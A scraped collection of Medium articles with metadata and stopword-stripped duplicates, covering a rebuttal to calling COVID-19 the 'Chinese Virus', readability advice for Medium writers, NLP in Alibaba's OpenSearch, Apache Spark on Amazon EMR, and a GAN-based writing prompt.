much more careful in assigning blame. Chinese authorities now have to respond to their negligence both domestically — as many of their people died and their economy is in shambles — and internationally. There should be pressure on the Chinese government to take aggressive measures to ensure a coronavirus outbreak doesn’t happen again. In practice, they should implement strict measures to close wet markets and more closely control the handling and sale of animals. 
That being said, for the vast majority of people in China who have never even been to a wet market, the virus itself is already a heavy and tragic burden. Those people deserve our solidarity; not misguided antipathy. Anger and fear are the most natural human reactions in times of crisis, but they only serve to make things worse. I don’t expect Bill to realize how mistaken his views are — controversy brings in ratings, which bring in money. I only hope his fans will think critically, recognize that he is wrong, and denounce him for using his platform to spread misinformation and stoke antagonism. The pandemic is causing more than enough human suffering as is. Let’s not add bigotry to misery.
https://medium.com/an-injustice/bill-maher-is-wrong-we-shouldnt-call-covid-19-the-chinese-virus-5d416100c2a2
['Alex Steullet']
2020-04-15 22:28:43.211000+00:00
['Culture', 'Society', 'Coronavirus', 'China', 'Politics']
Title Bill Maher Wrong Shouldn’t Call COVID19 “Chinese Virus”Content Bill Maher Wrong Shouldn’t Call COVID19 “Chinese Virus” Chinese people enough deal right Let’s add bigotry misery There’s pretty big debate raging right United States— pretty much United States— whether COVID19 dubbed “Chinese Virus” seemed obviously xenophobic didn’t feel much need write rebuttal nomenclature pushed almost exclusively conservative history bigotry including President Trump somehow nonsense started spread mainstream medium heeding advice World Health Organization use term “Chinese Virus” liberal comedian talk show host Bill Maher disagrees April 10 episode TV show Real Time Bill Maher thought wise film fiveminute rant whole thing China’s fault blaming Bill act carrier spread xenophobic stance beyond toxic bubble conservative news radio would like offer counterargument can’t believe need said here’s shouldn’t calling COVID19 “Chinese Virus” Real Time Bill Maher 10 April 2020 1 “we always do” argument counterfactual Bill start segment giving bunch example virus named originated argument I’ve also seen prominent figure Twitter — Lyme disease named town 7000 people Connecticut coronavirus tied 138 billion people China argument doesn’t hold several reason First China disease originated specifically single wet market Wuhan province name one market reason simple accuracy never true concern Ebola named river country ethnicity Zika virus named forest Nobody blaming river forest spread virus Bill explicitly want blame China expands naming convention fit political argument one case Bill cling virus actually named fairly large part world MERS Middle Eastern Respiratory Syndrome even nobody us full name nobody blamed entire Middle East area camel live close proximity human MERS said originated camel region home wide variety country ethnicity making name arguably le xenophobic important counter argument whole “this we’ve always named viruses” nonsense well it’s SARS stand Severe Acute Respiratory Syndrome SouthAsian Respiratory Syndrome Think pandemic we’ve suffered recent memory whether mad cow disease swine flu bird flu HIV HPV even going back black plague — none named disease originated Naming virus region originated exception rule anything questioning thought MERS acceptable final argument point virus began nobody calling “Chinese Virus” virus first showed medium simply “the coronavirus” name still used lot country — France it’s “coronavirus” Japan it’s “newform corona” 新型コロナ country reason another want blame China term “Chinese Virus” used adopted well virus started spread Well name already attributed widely accepted 2 reason criticize China origin virus isn’t one we’ve established historical logical reason call COVID19 “Chinese Virus” let’s look core Bill’s rant blaming China clear reason give people China eat bat sliver truth part argument It’s true wet market vector disease It’s true Chinese government knew poor policy decision made pandemic worse none eating bat Bill essentially saying “Eating bat wrong whole world eat find palatable like chicken pig cows” Plenty people around world eat plenty food mishandled lead disease includes United States buy whole host exotic meat know look epidemiological perspective problem isn’t Chinese people eating animal handled close proximity unsanitary condition wet market make likely certain virus strand jump specie mutate way ultimately dangerous human Chinese authority knew risk authorized wet market anyway reckless shortsighted policy deserves criticism Blame authority 
entire country population Also stop “Ewww gross could eat that” argument way demonize culture Bill’s tirade becomes particularly misleading implies Chinese culture general causing bunch virus emerge It’s true SARS also originated region although enough evidence suggest came wet market Bird flu likely come intensive bird farming — chicken almost everyone eats tremendous quantity world bird flu epidemic started Hong Kong doesn’t wet market whose culture overall significantly different people Wuhan province sum coronavirus much complex “China unhealthy stuff” using pandemic air political grievance isn’t helping anyone 3 We’re together world’s leading health human right expert adamant We’re together much careful assigning blame Chinese authority respond negligence domestically — many people died economy shamble — internationally pressure Chinese government take aggressive measure ensure coronavirus outbreak doesn’t happen practice implement strict measure close wet market closely control handling sale animal said vast majority people China never even wet market virus already heavy tragic burden people deserve solidarity misguided antipathy Anger fear natural human reaction time crisis serve make thing worse don’t expect Bill realize mistaken view — controversy brings rating bring money hope fan think critically recognize wrong denounce using platform spread misinformation stoke antagonism pandemic causing enough human suffering Let’s add bigotry miseryTags Culture Society Coronavirus China Politics
3,875
Stop Thinking You Need to Dumb Down Your Articles for Medium
Stop Thinking You Need to Dumb Down Your Articles for Medium I analyzed the top 10 popular articles for the day, and this is what I discovered. Photo by Christian Perello on Unsplash If you read Medium articles on how to succeed at writing on Medium, you likely have seen the popular advice that you need to keep your writing level around a 6th-grade reading level. The argument here is that the average American has around a 7th or 8th-grade reading level. Also, online reading is quite different than printed pages. When people read articles online, they tend to scan rather than read every word. Now, writing at a 6th-grade reading level doesn't mean your writing is meant for 6th graders. Ernest Hemingway famously wrote at a 5th-grade reading level much of the time, and his works are not taught in grammar school. However, I question the need to write at a 6th grade level for the Medium audience. For one thing, many Medium readers are also writers. Writers tend to read a lot. People who read a lot naturally read at higher levels than those who do not. Further, not every popular article on the internet is at a low reading level. The New York Times articles, for example, average a 10th-grade reading level. But what about Medium? Do we really need to be shooting for 6th-grade reading levels to get more claps and reader engagement?
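For anyone who wants to check a draft against these numbers before publishing, here is a small illustrative example of scoring text with standard readability formulas. It assumes the third-party textstat package (pip install textstat) and is not something the author says she used for her analysis.
# Score a draft with two common readability measures
import textstat

draft = ("If you read Medium articles on how to succeed at writing on Medium, "
         "you have likely seen the advice to keep your writing at roughly a "
         "6th-grade reading level.")

print(textstat.flesch_kincaid_grade(draft))   # approximate U.S. school grade level
print(textstat.flesch_reading_ease(draft))    # 0-100 scale; higher means easier to read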
https://medium.com/illumination/stop-thinking-you-need-to-dumb-down-your-articles-for-medium-dcee6eb75f10
['Jennifer Geer']
2020-10-24 18:04:01.690000+00:00
['Creativity', 'Writing Tips', 'Medium', 'Writing Advice', 'Writing']
Title Stop Thinking Need Dumb Articles MediumContent Stop Thinking Need Dumb Articles Medium analyzed top 10 popular article day discovered Photo Christian Perello Unsplash read Medium article succeed writing Medium likely seen popular advice need keep writing level around 6thgrade reading level argument average American around 7th 8thgrade reading level Also online reading quite different printed page people read article online tend scan rather read every word writing 6thgrade reading level doesnt mean writing meant 6th grader Ernest Hemingway famously wrote 5thgrade reading level much time work taught grammar school However question need write 6th grade level Medium audience one thing many Medium reader also writer Writers tend read lot People read lot naturally read higher level every popular article internet low reading level New York Times article example average 10thgrade reading level Medium really need shooting 6thgrade reading level get clap reader engagementTags Creativity Writing Tips Medium Writing Advice Writing
3,876
The Application of Natural Language Processing in OpenSearch
Catch the replay of the Apsara Conference 2020 at this link! By ELK Geek, with special guest, Xie Pengjun (Chengchen), Senior Algorithm Expert of Alibaba Cloud AI Introduction: When building search engines, effect optimization issues will emerge, many of which are related to Natural Language Processing (NLP). This article interprets and analyzes these issues by combining the technical points of NLP in OpenSearch. Natural Language Processing Research on NLP aims to achieve effective communication between humans and computers through languages. It is a science that integrates linguistics, psychology, computer science, mathematics, and statistics. It involves many topics, such as analysis, extraction, understanding, conversion, and the generation of natural languages and symbolic languages. The Stages of AI Computing Intelligence: It refers to the ability to outperform humans in some areas by relying on computing power and the ability to store massive data. A representative example is “Alphago” from Google. With the strong computing power of Google TPU and the combination of algorithms, like Monte Carlo Tree Search (MCTS) and reinforcement learning, Alphago can make good decisions by processing massive information about the Go game. Thus, it can outperform humans in terms of computational ability. It refers to the ability to outperform humans in some areas by relying on computing power and the ability to store massive data. A representative example is “Alphago” from Google. With the strong computing power of Google TPU and the combination of algorithms, like Monte Carlo Tree Search (MCTS) and reinforcement learning, Alphago can make good decisions by processing massive information about the Go game. Thus, it can outperform humans in terms of computational ability. Intellisense: It refers to the ability to identify important elements from unstructured data. For example, it can analyze a query to identify information, such as people’s names, places, and institutions. It refers to the ability to identify important elements from unstructured data. For example, it can analyze a query to identify information, such as people’s names, places, and institutions. Cognitive Intelligence: Based on intellisense, cognitive intelligence can understand the meaning of elements and make some inferences. For example, in Chinese, sentences like “谢霆锋是谁的儿子” and “谁是谢霆锋的儿子” both contain the same characters, but the semantics of them are different. This is what cognitive intelligence aims to solve. Based on intellisense, cognitive intelligence can understand the meaning of elements and make some inferences. For example, in Chinese, sentences like “谢霆锋是谁的儿子” and “谁是谢霆锋的儿子” both contain the same characters, but the semantics of them are different. This is what cognitive intelligence aims to solve. Creative Intelligence: It refers to computers’ ability to create sentences that conform to common sense, semantics, and logic, based on understandings of semantics. For example, computers can automatically write novels, create music, and chat with people naturally. The research on NLP covers all of the subjects above. NLP is necessary to realize comprehensive AI. The Development Trend of NLP The breakthrough in in-depth language models will lead to the progress of important natural language technologies. NLP services on public clouds will evolve to customized services from general functions. Natural language technologies will be gradually and closely integrated with industries and scenarios to create greater value. 
The Capabilities of Alibaba Group’s NLP Platform From bottom to top, the capabilities of the NLP platform are divided into NLP data, NLP basic capabilities, NLP application technologies, and high-level applications. NLP data is the basis for many algorithms, including language dictionaries, substantive knowledge dictionaries, syntactic dictionaries, and sentiment analysis dictionaries. Basic NLP technologies include lexical analysis, syntactic analysis, text analysis, and in-depth models. On top of basic NLP technologies, there are vertical technologies of NLP, including Q&A and conversation technologies, anti-spam technology, and address resolution. The combination of these technologies supports many applications. Among them, OpenSearch is an application with intensive NLP capabilities. Applications and Typical NLP Technologies in OpenSearch The infrastructure of OpenSearch includes Alibaba Cloud’s basic products and exclusive search systems based on the search scenarios of Alibaba Cloud’s ecosystem, such as HA3, RTP, and Dii. The basic management platform ensures the collection, management, and training of offline data. The algorithm module is divided into two parts. One is related to query parsing, including multi-grained word segmentation (MWS), entity recognition, error correction, and rewriting. Another is related to correlation and sorting, including text correlation, prediction of Click Through Rate (CTR) and Conversion Rate (CVR), and Learning to Rank (LTR). Parts with orange backgrounds are related to NLP The goal of OpenSearch is to create all-in-one and out-of-the-box intelligent search services. Alibaba Cloud will open these algorithms to users in the form of industry templates, scenarios, and peripheral services. The Analyzing Procedure of NLP in OpenSearch A search starts with a keyword. For example, when a user searches “aj1北卡兰新款球鞋” in Chinese, the analyzing procedure works like this: Cross-Domain Word Segmentation Alibaba Cloud has provided a series of open models for cross-domain word segmentation in OpenSearch. Word Segmentation Challenges The effect of word segmentation is greatly reduced by additional unrecognized words or so-called “new words” in various fields. The costs to customize word segmentation models for new users of the process from data labeling to data training are expensive. Solution A model for forming terms can be built by combining statistical characteristics, such as mutual information, and left-skewed and right-skewed log transformations. By doing so, a domain dictionary can be quickly built based on user data. By combining word segmentation models from a source domain with dictionaries from a target domain, a tokenizer can be quickly built in a target domain based on remote supervision technology. The figure above shows the automatic cross-domain word segmentation framework. Users need to provide some corpus data from their business, and Alibaba Cloud can automatically build a customized word segmentation model. This method greatly improves efficiency and meets the needs of customers quickly. This technology offers better results compared to the open-source general models of word segmentation in various domains. Named Entity Recognition (NER) NER can recognize important elements. For example, NER can recognize and extract people’s names, places, and times in queries. Challenges and Difficulties There is a lot of research and challenges for NER in NLP. 
NER faces difficulties, such as boundary ambiguity, semantic ambiguity, and nesting ambiguity, especially in Chinese, due to the lack of native word separators. Solution The architecture of the NER model in OpenSearch is shown in the upper-right corner of the following figure. In OpenSearch, many users have accumulated a large number of dictionary object libraries. To make full use of these libraries, Alibaba Cloud builds a GraphNER framework that organically integrates knowledge based on the BERT model. As shown on the table in the lower-right corner, the best effect of NER can be achieved in Chinese. Spelling Correction The error correction steps of OpenSearch include mining, training, evaluation, and online prediction. The main model of spelling correction is based on the statistical translation model and the neural network translation model. Also, the model has a complete set of methods in performance, display style, and intervention. Semantic Matching The emergence of in-depth language models has greatly improved many NLP tasks, especially for semantic matching. Alibaba DAMO Academy has also proposed many innovations based on BERT and developed the exclusive StructBERT model. The main innovation of StructBERT is that in the training of in-depth language models, it adds more objective functions of words and term orders. More diverse objective functions for sentence structure prediction are also added to carry out multi-task learning. However, the universal StructBERT model cannot be provided to different customers in different domains. Alibaba Cloud needs to adapt StructBERT to different domains. Therefore, a three-stage paradigm for semantic matching has been proposed to create a semantic matching model that is used to quickly produce customized semantic models for customers. Process details are shown in the figure below: Services Based on NLP Algorithms The systematic architecture of services based on algorithms includes offline computing, online engines, and product consoles. As shown in the figure, the light blue area shows the algorithm-related features provided by NLP in OpenSearch. Users can experience and use these features directly in the console. Original Source: Gain Access to Expert View — Subscribe to DDI Intel
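As a concrete illustration of the “term-forming model built from statistical characteristics such as mutual information” mentioned in the word-segmentation section, here is a minimal self-contained sketch that scores adjacent tokens by pointwise mutual information (PMI) and keeps the highest-scoring pairs as candidate domain terms. The tiny pre-tokenized corpus is invented for illustration; OpenSearch’s actual pipeline also uses left/right context statistics and remote supervision, which this sketch omits.
# Score adjacent token pairs by PMI; high-PMI pairs are candidate domain-dictionary terms
import math
from collections import Counter

corpus = [
    "aj1 北卡兰 新款 球鞋",
    "aj1 北卡兰 球鞋 现货",
    "新款 球鞋 北卡兰 配色",
    "aj1 新款 现货",
]

unigrams, bigrams = Counter(), Counter()
for line in corpus:
    tokens = line.split()
    unigrams.update(tokens)
    bigrams.update(zip(tokens, tokens[1:]))

total_uni = sum(unigrams.values())
total_bi = sum(bigrams.values())

def pmi(pair):
    first, second = pair
    p_pair = bigrams[pair] / total_bi
    p_first = unigrams[first] / total_uni
    p_second = unigrams[second] / total_uni
    return math.log2(p_pair / (p_first * p_second))

# Print the three highest-scoring adjacent pairs as dictionary candidates
for pair in sorted(bigrams, key=pmi, reverse=True)[:3]:
    print(pair, round(pmi(pair), 2))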
https://medium.com/datadriveninvestor/the-application-of-natural-language-processing-in-opensearch-7b91a899d9bb
['Alibaba Cloud']
2020-12-08 15:36:51.284000+00:00
['Algorithms', 'Big Data', 'Naturallanguageprocessing', 'Artificial Intelligence', 'Alibabacloud']
Title Application Natural Language Processing OpenSearchContent Catch replay Apsara Conference 2020 link ELK Geek special guest Xie Pengjun Chengchen Senior Algorithm Expert Alibaba Cloud AI Introduction building search engine effect optimization issue emerge many related Natural Language Processing NLP article interprets analyzes issue combining technical point NLP OpenSearch Natural Language Processing Research NLP aim achieve effective communication human computer language science integrates linguistics psychology computer science mathematics statistic involves many topic analysis extraction understanding conversion generation natural language symbolic language Stages AI Computing Intelligence refers ability outperform human area relying computing power ability store massive data representative example “Alphago” Google strong computing power Google TPU combination algorithm like Monte Carlo Tree Search MCTS reinforcement learning Alphago make good decision processing massive information Go game Thus outperform human term computational ability refers ability outperform human area relying computing power ability store massive data representative example “Alphago” Google strong computing power Google TPU combination algorithm like Monte Carlo Tree Search MCTS reinforcement learning Alphago make good decision processing massive information Go game Thus outperform human term computational ability Intellisense refers ability identify important element unstructured data example analyze query identify information people’s name place institution refers ability identify important element unstructured data example analyze query identify information people’s name place institution Cognitive Intelligence Based intellisense cognitive intelligence understand meaning element make inference example Chinese sentence like “谢霆锋是谁的儿子” “谁是谢霆锋的儿子” contain character semantics different cognitive intelligence aim solve Based intellisense cognitive intelligence understand meaning element make inference example Chinese sentence like “谢霆锋是谁的儿子” “谁是谢霆锋的儿子” contain character semantics different cognitive intelligence aim solve Creative Intelligence refers computers’ ability create sentence conform common sense semantics logic based understanding semantics example computer automatically write novel create music chat people naturally research NLP cover subject NLP necessary realize comprehensive AI Development Trend NLP breakthrough indepth language model lead progress important natural language technology NLP service public cloud evolve customized service general function Natural language technology gradually closely integrated industry scenario create greater value Capabilities Alibaba Group’s NLP Platform bottom top capability NLP platform divided NLP data NLP basic capability NLP application technology highlevel application NLP data basis many algorithm including language dictionary substantive knowledge dictionary syntactic dictionary sentiment analysis dictionary Basic NLP technology include lexical analysis syntactic analysis text analysis indepth model top basic NLP technology vertical technology NLP including QA conversation technology antispam technology address resolution combination technology support many application Among OpenSearch application intensive NLP capability Applications Typical NLP Technologies OpenSearch infrastructure OpenSearch includes Alibaba Cloud’s basic product exclusive search system based search scenario Alibaba Cloud’s ecosystem HA3 RTP Dii basic management platform ensures 
collection management training offline data algorithm module divided two part One related query parsing including multigrained word segmentation MWS entity recognition error correction rewriting Another related correlation sorting including text correlation prediction Click Rate CTR Conversion Rate CVR Learning Rank LTR Parts orange background related NLP goal OpenSearch create allinone outofthebox intelligent search service Alibaba Cloud open algorithm user form industry template scenario peripheral service Analyzing Procedure NLP OpenSearch search start keyword example user search “aj1北卡兰新款球鞋” Chinese analyzing procedure work like CrossDomain Word Segmentation Alibaba Cloud provided series open model crossdomain word segmentation OpenSearch Word Segmentation Challenges effect word segmentation greatly reduced additional unrecognized word socalled “new words” various field cost customize word segmentation model new user process data labeling data training expensive Solution model forming term built combining statistical characteristic mutual information leftskewed rightskewed log transformation domain dictionary quickly built based user data combining word segmentation model source domain dictionary target domain tokenizer quickly built target domain based remote supervision technology figure show automatic crossdomain word segmentation framework Users need provide corpus data business Alibaba Cloud automatically build customized word segmentation model method greatly improves efficiency meet need customer quickly technology offer better result compared opensource general model word segmentation various domain Named Entity Recognition NER NER recognize important element example NER recognize extract people’s name place time query Challenges Difficulties lot research challenge NER NLP NER face difficulty boundary ambiguity semantic ambiguity nesting ambiguity especially Chinese due lack native word separator Solution architecture NER model OpenSearch shown upperright corner following figure OpenSearch many user accumulated large number dictionary object library make full use library Alibaba Cloud build GraphNER framework organically integrates knowledge based BERT model shown table lowerright corner best effect NER achieved Chinese Spelling Correction error correction step OpenSearch include mining training evaluation online prediction main model spelling correction based statistical translation model neural network translation model Also model complete set method performance display style intervention Semantic Matching emergence indepth language model greatly improved many NLP task especially semantic matching Alibaba DAMO Academy also proposed many innovation based BERT developed exclusive StructBERT model main innovation StructBERT training indepth language model add objective function word term order diverse objective function sentence structure prediction also added carry multitask learning However universal StructBERT model cannot provided different customer different domain Alibaba Cloud need adapt StructBERT different domain Therefore threestage paradigm semantic matching proposed create semantic matching model used quickly produce customized semantic model customer Process detail shown figure Services Based NLP Algorithms systematic architecture service based algorithm includes offline computing online engine product console shown figure light blue area show algorithmrelated feature provided NLP OpenSearch Users experience use feature directly console Original Source Gain Access 
Expert View — Subscribe DDI IntelTags Algorithms Big Data Naturallanguageprocessing Artificial Intelligence Alibabacloud
3,877
Apache Spark on Amazon EMR
By Dr Peter Smith, Principal Software Engineer, ACL. I recently had the good fortune of presenting at the Vancouver Amazon Web Services User Group. This monthly event, organized by Onica, is a great opportunity to network with like-minded people in the community, and to discuss AWS-related topics. In my presentation, I provided an introduction to the Apache Spark analytics framework, and gave a quick demo of using Amazon EMR (Elastic Map Reduce) to perform a few basic queries. Here’s a summary of what was discussed. Apache Spark — Unified Analytics Engine Apache Spark has rapidly become a mainstream solution for big data analytics. Numerous organizations take advantage of Spark — processing terabytes of data with the goal of discovering new insights they wouldn’t otherwise have. This includes processing of financial data, analyzing web click streams, and monitoring and reacting to data from IoT sensors. There are many ways to perform analytics with Spark. When Spark is used in a batch-processing environment, input data is placed into cheap storage (such as Amazon S3). At a later time, a Spark cluster reads the data, performs complex analytics (sometimes taking minutes or hours), then writes the final result to the output. In addition to this traditional batch-processing model, Spark also supports machine learning, real-time streaming analytics, and graph-based analytics. What makes Spark so powerful is the ability to divide and conquer. Multiple worker nodes are created, with the analytics computation being distributed amongst them. The following diagram illustrates a Spark cluster with four worker nodes (EC2 instances). Input data is stored in S3 files, and then partitioned and shared amongst the workers. The result of the analytic computation can later be written back to another S3 bucket. In addition to Apache Spark being a well-supported open source framework, with an active user community, AWS makes it trivial to create and manage Spark clusters as part of their EMR (Elastic Map Reduce) offering. More on that later. Spark is Different from a Relational Database Although Spark is often used to analyze tables of “rectangular” data (with rows and columns), and it also supports the familiar SQL language, it would be incorrect to refer to Spark as a relational database. In fact, there are numerous key differences between how Spark manipulates data, versus how the same task is performed in a relational database. To help understand the benefits provided by Spark, let’s discuss these differences. Programming Languages Most relational database systems support the SQL language for querying data. In addition, many of these systems also support the concept of stored procedures, allowing user-defined code to execute inside the database. Although stored procedures provide immense value, they’re written in the database’s specific programming language, and are limited to the run-time environment provided by the database. In the case of Spark, the SQL language is partially supported, but that’s only the starting point. Spark runs on a JVM (Java Virtual Machine) and therefore analytics code can be written in any JVM-based language, such as Java or Scala, providing compatibility with decades of existing code libraries. Additionally, the Python language is fully supported, allowing access to the great libraries and utilities that data scientists know and love. Scalability Relational databases can utilize multiple CPU cores, providing excellent vertical scalability. 
However, many of the advanced features (such as concurrency, locking, and failure recovery) are easier to support if those CPU cores are tightly coupled within a single server host. That is, all the CPUs must share the same memory space and therefore be inside the same physical host. In the case of Spark, support for distributed computation is of primary importance, allowing a Spark cluster to horizontally scale up to much larger data sets (running on 100s or 1000s of hosts). Of course, the distributed (multi-server) nature of Spark means that concurrency, locking, and failure recovery must be handled very differently than with a centralized database. Data Storage Formats Because of the tightly-coupled nature of a relational database, the server has complete control over how data is stored on disk. The operations for querying, inserting, and updating data rows are optimized to use data structures such as B-Trees and WALs. The database user (a human) likely knows nothing about how these data structures work, and will never examine the underlying data files. The complexity of the database is therefore hidden. In a Spark environment, the data formats are fully under the control of users. Data is read from disk in a generic format, such as CSV, JSON, or Parquet, and the final output is written back to disk in a similar user-selected format. Read/Write Versus Read-Only As a result of Spark allowing arbitrary user-chosen disk formats, all reading of input, and writing of output, happens in a user-directed way. Spark doesn't have control of how data is placed on disk, and therefore isn't able to insert new data rows, or update individual fields, as you'd often do in a relational database. Instead, Spark reads the data from the input file into main memory (as much as will fit at one time), then performs the analytic computation. Once the final result is complete, the output is fully written back to disk. The key point is that Spark is not suited for transactional operations where small in-place updates are made to existing data. Resilience In a relational database, it's common to use a master-slave arrangement to recover from failures. The slave server functions in a passive state, simply tracking all the changes made to the master's data. However, if the master server fails, the slave is promoted to become the new master, with very little downtime. Spark uses a very different approach — rather than having a hot-backup for each of the worker nodes, any failure results in the failed worker's computation being repeated from the beginning (or the latest checkpoint). More specifically, Spark tracks the data's lineage, so it knows how to regenerate the computation by replaying the same analytic tasks on a different server. With 1000s of worker nodes, there's a good chance that one of them will fail and its work must be replayed. Note, however, that it would be significantly more expensive to have 1000 slave nodes acting as hot-backups for the 1000 primary worker nodes! Always-On or On-Demand? Relational databases run on a 24/7 basis. As new data arrives, or existing data is updated, the server is always up-and-running, and available to receive and store the updates. If you have a large database with lots of CPU power and lots of RAM, the infrastructure costs start to add up. In a Spark environment, it's common to collect data (in CSV or JSON format) and immediately place it into cheap storage (such as Amazon S3).
If nothing else is done with the data at that point in time, there’s no need for Spark workers to be available. All you pay for is the low monthly cost of data in S3. However, when it’s time to perform some analytics (for example, at the end of the month, or the fiscal year), we fire up a large Spark cluster with lots of worker nodes. Only at that time is the data read into the cluster, and the intense computation is performed. Once the work is complete, the Spark cluster is shut down to save the infrastructure cost. A Practical Example As mentioned earlier, Apache Spark is an open source package, freely available for download. However, there’s still plenty of effort required to configure the worker nodes and install the software. Luckily for us, Amazon EMR makes this trivial, allowing creation of a Spark cluster in a matter of minutes. Starting the Cluster
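The article breaks off at "Starting the Cluster", so the cluster-creation steps themselves are not reproduced here. To make the batch-processing model described above concrete, here is a minimal PySpark sketch of the kind of job you would submit to such a cluster: read CSV files from S3, run an aggregation, and write the result back to another bucket. This is not code from the original demo; the bucket names and column names are illustrative assumptions, but the script would run as-is when submitted to an EMR cluster with spark-submit.

# monthly_report.py -- minimal Spark batch-job sketch (hypothetical buckets and columns).
from pyspark.sql import SparkSession
from pyspark.sql import functions as F

# The SparkSession is the entry point; on EMR it connects to the YARN-managed cluster.
spark = SparkSession.builder.appName("MonthlyRevenueReport").getOrCreate()

# Read partitioned CSV input from cheap S3 storage into a distributed DataFrame.
orders = spark.read.csv("s3://example-input-bucket/orders/", header=True, inferSchema=True)

# The analytic computation: total revenue per region, largest first.
report = (
    orders.groupBy("region")
          .agg(F.sum("amount").alias("total_revenue"))
          .orderBy(F.desc("total_revenue"))
)

# Write the final result back to a different S3 bucket, in Parquet format.
report.write.mode("overwrite").parquet("s3://example-output-bucket/reports/monthly-revenue/")

spark.stop()

Submitted with spark-submit monthly_report.py, the same script scales from a handful of workers to hundreds without modification, which is exactly the divide-and-conquer property discussed earlier.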
https://medium.com/galvanize/apache-spark-on-amazon-emr-98f04fd346c9
['Peter Smith']
2018-12-17 17:01:00.945000+00:00
['Database', 'Software Development', 'Apache Spark', 'Big Data', 'AWS']
Title Apache Spark Amazon EMRContent Dr Peter Smith Principal Software Engineer ACL recently good fortune presenting Vancouver Amazon Web Services User Group monthly event organized Onica great opportunity network likeminded people community discus AWSrelated topic presentation provided introduction Apache Spark analytics framework gave quick demo using Amazon EMR Elastic Map Reduce perform basic query Here’s summary discussed Apache Spark — Unified Analytics Engine Apache Spark rapidly become mainstream solution big data analytics Numerous organization take advantage Spark — processing terabyte data goal discovering new insight wouldn’t otherwise includes processing financial data analyzing web click stream monitoring reacting data IoT sensor many way perform analytics Spark Spark used batchprocessing environment input data placed cheap storage Amazon S3 later time Spark cluster read data performs complex analytics sometimes taking minute hour writes final result output addition traditional batchprocessing model Spark also support machine learning realtime streaming analytics graphbased analytics make Spark powerful ability divide conquer Multiple worker node created analytics computation distributed amongst following diagram illustrates Spark cluster four worker node EC2 instance Input data stored S3 file partitioned shared amongst worker result analytic computation later written back another S3 bucket addition Apache Spark wellsupported open source framework active user community AWS make trivial create manage Spark cluster part EMR Elastic Map Reduce offering later Spark Different Relational Database Although Spark often used analyze table “rectangular” data row column also support familiar SQL language would incorrect refer Spark relational database fact numerous key difference Spark manipulates data versus task performed relational database help understand benefit provided Spark let’s discus difference Programming Languages relational database system support SQL language querying data addition many system also support concept stored procedure allowing userdefined code execute inside database Although stored procedure provide immense value they’re written database’s specific programming language limited runtime environment provided database case Spark SQL language partially supported that’s starting point Spark run JVM Java Virtual Machine therefore analytics code written JVMbased language Java Scala providing compatibility decade existing code library Additionally Python language fully supported allowing access great library utility data scientist know love Scalability Relational database utilize multiple CPU core providing excellent vertical scalability However many advanced feature concurrency locking failure recovery easier support CPU core tightly coupled within single server host CPUs must share memory space therefore inside physical host case Spark support distributed computation primary importance allowing Spark cluster horizontally scale much larger data set running 100 1000 host course distributed multiserver nature Spark mean concurrency locking failure recovery must handled differently centralized database Data Storage Formats tightlycoupled nature relational database server complete control data stored disk operation querying inserting updating data row optimized use data structure BTrees WALs database user human likely know nothing data structure work never examine underlying data file complexity database therefore hidden Spark environment data format fully control user 
Data read disk generic format CSV JSON Parquet final output written back disk similar userselected format ReadWrite Versus ReadOnly result Spark allowing arbitrary userchosen disk format reading input writing output happens userdirected way Spark doesn’t control data placed disk therefore isn’t able insert new data row update individual field you’d often relational database Instead Spark read data input file main memory much fit one time performs analytic computation final result complete output fully written back disk key point Spark suited transactional operation small inplace update made existing data Resilience relational database it’s common use masterslave arrangement recover failure slave server function passive state simply tracking change made master’s data However master server fails slave promoted become new master little downtime Spark us different approach — rather hotbackup worker node failure result failed worker’s computation repeated beginning latest check point specifically Spark track data’s lineage know regenerate computation replaying analytic task different server 1000 worker node there’s good chance one fail work must replayed Note however would significantly expensive 1000 slave node acting hotbackups 1000 primary worker node AlwaysOn OnDemand Relational database run 247 basis new data arrives existing data updated server always upandrunning available receive store update large database lot CPU power lot RAM infrastructure cost start add Spark environment it’s common collect data CSV JSON format immediately place cheap storage Amazon S3 nothing else done data point time there’s need Spark worker available pay low monthly cost data S3 However it’s time perform analytics example end month fiscal year fire large Spark cluster lot worker node time data read cluster intense computation performed work complete Spark cluster shut save infrastructure cost Practical Example mentioned earlier Apache Spark open source package freely available download However there’s still plenty effort required configure worker node install software Luckily u Amazon EMR make trivial allowing creation Spark cluster matter minute Starting ClusterTags Database Software Development Apache Spark Big Data AWS
3,878
Weekly Pentina Prompt: It’s Artificial
The above images are not real. They are not actual people, works of art, or cats. They are not photographs. There is no copyright or attribution required to use them because a computer made them up on the spot. These images are computer generated on the fly by a form of artificial intelligence known as a Generative Adversarial Network (GAN) which has been trained by lots of actual images to create these inhuman hybrids. If you use it, you will never get the same image as I do and never the same image twice. You might even find some freak occurrences with half-missing glasses, unusually large earlobes, or eyeballs in the wrong places. Don’t believe me? Stop reading this right now and go try it. How long did you spend on there? No matter. Now that you understand robots are going to take over the internet and use it to control our weak minds, it’s time to write a story. So, head back over to thispersondoesnotexist.com and start generating some very real-looking fake images until you find one that inspires a Pentina. At least this week, the picture part of your story is easy. Your prompt is to generate an interesting face (or work of art, or cat) using this mind-boggling tool and write a 50-word story about that image. Be sure to save your image and use it as the featured photo for your Pentina. Just don’t try using an image of a horse — those still need a little work ;-).
https://medium.com/centina-pentina/weekly-pentina-prompt-its-artificial-41396da6a8cc
['J.A. Taylor']
2020-12-18 14:03:24.595000+00:00
['AI', 'Pubprompt', 'Artificial Intelligence', 'Writing Prompts', 'Prompt']
Title Weekly Pentina Prompt It’s ArtificialContent image real actual people work art cat photograph copyright attribution required use computer made spot image computer generated fly form artificial intelligence known Generative Adversarial Network GAN trained lot actual image create inhuman hybrid use never get image never image twice might even find freak occurrence halfmissing glass unusually large earlobe eyeball wrong place Don’t believe Stop reading right go try long spend matter understand robot going take internet use control weak mind it’s time write story head back thispersondoesnotexistcom start generating reallooking fake image find one inspires Pentina least week picture part story easy prompt generate interesting face work art cat using mindboggling tool write 50word story image sure save image use featured photo Pentina don’t try using image horse — still need little work Tags AI Pubprompt Artificial Intelligence Writing Prompts Prompt
3,879
Deep Learning Applications : Neural Style Transfer
